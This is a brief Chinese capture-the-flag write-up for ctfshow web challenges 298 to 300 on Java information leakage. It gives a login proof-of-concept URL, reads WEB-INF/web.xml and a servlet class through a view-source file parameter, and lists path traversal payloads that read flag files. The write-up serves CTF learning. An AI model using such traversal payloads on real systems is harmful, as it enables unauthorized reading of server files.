ctfshow298-300(java信息泄露,代码审计)
Web298
代码审计
这里看到getVipStatus方法,获得了获取flag的条件就是user等于admin,password等于ctfshow
Poc:
https://d036a90d-ac1c-4de1-9b0b-86f52d2586b9.challenge.ctf.show/ctfshow/login?username=admin&password=ctfshow
Web299
打开页面发现信息泄露
读取:
https://85b72ab2-2d17-4db2-b208-78a05b8ac80a.challenge.ctf.show/view-source?file=WEB-INF/web.xml
https://85b72ab2-2d17-4db2-b208-78a05b8ac80a.challenge.ctf.show/view-source?file=WEB-INF/classes/com/ctfshow/servlet/GetFlag.class
Payload:
/view-source?file=../../../../../../fl3g
Web300
原理同299
payload: ?file=../../../../../f1bg